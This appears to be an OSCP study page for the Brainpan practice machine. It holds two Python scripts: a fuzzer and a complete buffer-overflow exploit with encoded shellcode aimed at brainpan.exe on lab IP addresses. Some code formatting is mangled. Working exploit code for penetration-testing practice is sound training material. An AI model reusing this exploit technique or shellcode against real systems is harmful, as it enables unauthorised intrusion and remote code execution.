OSCP
Search…
Brainpan

!/usr/bin/python

import socket,sys
payload = "A" * 1000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect(('192.168.228.140',9999)) # IP of WinXP SP3 machine running brainpan.exe except: print "[-] Connection failed! Noob!" sys.exit(0)
s.recv(1024) s.send(payload)
==========================================

!/usr/bin/python

import socket,sys
shellcode = "" shellcode += "\xda\xc0\xba\x2c\xaf\xfd\xb9\xd9\x74\x24\xf4\x58" shellcode += "\x33\xc9\xb1\x52\x31\x50\x17\x83\xe8\xfc\x03\x7c" shellcode += "\xbc\x1f\x4c\x80\x2a\x5d\xaf\x78\xab\x02\x39\x9d" shellcode += "\x9a\x02\x5d\xd6\x8d\xb2\x15\xba\x21\x38\x7b\x2e" shellcode += "\xb1\x4c\x54\x41\x72\xfa\x82\x6c\x83\x57\xf6\xef" shellcode += "\x07\xaa\x2b\xcf\x36\x65\x3e\x0e\x7e\x98\xb3\x42" shellcode += "\xd7\xd6\x66\x72\x5c\xa2\xba\xf9\x2e\x22\xbb\x1e" shellcode += "\xe6\x45\xea\xb1\x7c\x1c\x2c\x30\x50\x14\x65\x2a" shellcode += "\xb5\x11\x3f\xc1\x0d\xed\xbe\x03\x5c\x0e\x6c\x6a" shellcode += "\x50\xfd\x6c\xab\x57\x1e\x1b\xc5\xab\xa3\x1c\x12" shellcode += "\xd1\x7f\xa8\x80\x71\x0b\x0a\x6c\x83\xd8\xcd\xe7" shellcode += "\x8f\x95\x9a\xaf\x93\x28\x4e\xc4\xa8\xa1\x71\x0a" shellcode += "\x39\xf1\x55\x8e\x61\xa1\xf4\x97\xcf\x04\x08\xc7" shellcode += "\xaf\xf9\xac\x8c\x42\xed\xdc\xcf\x0a\xc2\xec\xef" shellcode += "\xca\x4c\x66\x9c\xf8\xd3\xdc\x0a\xb1\x9c\xfa\xcd" shellcode += "\xb6\xb6\xbb\x41\x49\x39\xbc\x48\x8e\x6d\xec\xe2" shellcode += "\x27\x0e\x67\xf2\xc8\xdb\x28\xa2\x66\xb4\x88\x12" shellcode += "\xc7\x64\x61\x78\xc8\x5b\x91\x83\x02\xf4\x38\x7e" shellcode += "\xc5\x3b\x14\x64\xc2\xd4\x67\x64\xfc\x78\xe1\x82" shellcode += "\x94\x90\xa7\x1d\x01\x08\xe2\xd5\xb0\xd5\x38\x90" shellcode += "\xf3\x5e\xcf\x65\xbd\x96\xba\x75\x2a\x57\xf1\x27" shellcode += "\xfd\x68\x2f\x4f\x61\xfa\xb4\x8f\xec\xe7\x62\xd8" shellcode += "\xb9\xd6\x7a\x8c\x57\x40\xd5\xb2\xa5\x14\x1e\x76" shellcode += "\x72\xe5\xa1\x77\xf7\x51\x86\x67\xc1\x5a\x82\xd3" shellcode += "\x9d\x0c\x5c\x8d\x5b\xe7\x2e\x67\x32\x54\xf9\xef" shellcode += "\xc3\x96\x3a\x69\xcc\xf2\xcc\x95\x7d\xab\x88\xaa" shellcode += "\xb2\x3b\x1d\xd3\xae\xdb\xe2\x0e\x6b\xeb\xa8\x12" shellcode += "\xda\x64\x75\xc7\x5e\xe9\x86\x32\x9c\x14\x05\xb6" shellcode += "\x5d\xe3\x15\xb3\x58\xaf\x91\x28\x11\xa0\x77\x4e" shellcode += "\x86\xc1\x5d"
payload = "A" 524 + "\xf3\x12\x17\x31" + "C"12 + shellcode s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect(('192.168.228.141',9999)) # IP of WinXP SP3 machine running brainpan.exe except: print "[-] Connection failed! Noob!" sys.exit(0)
s.recv(1024) s.send(payload)
Last modified 2yr ago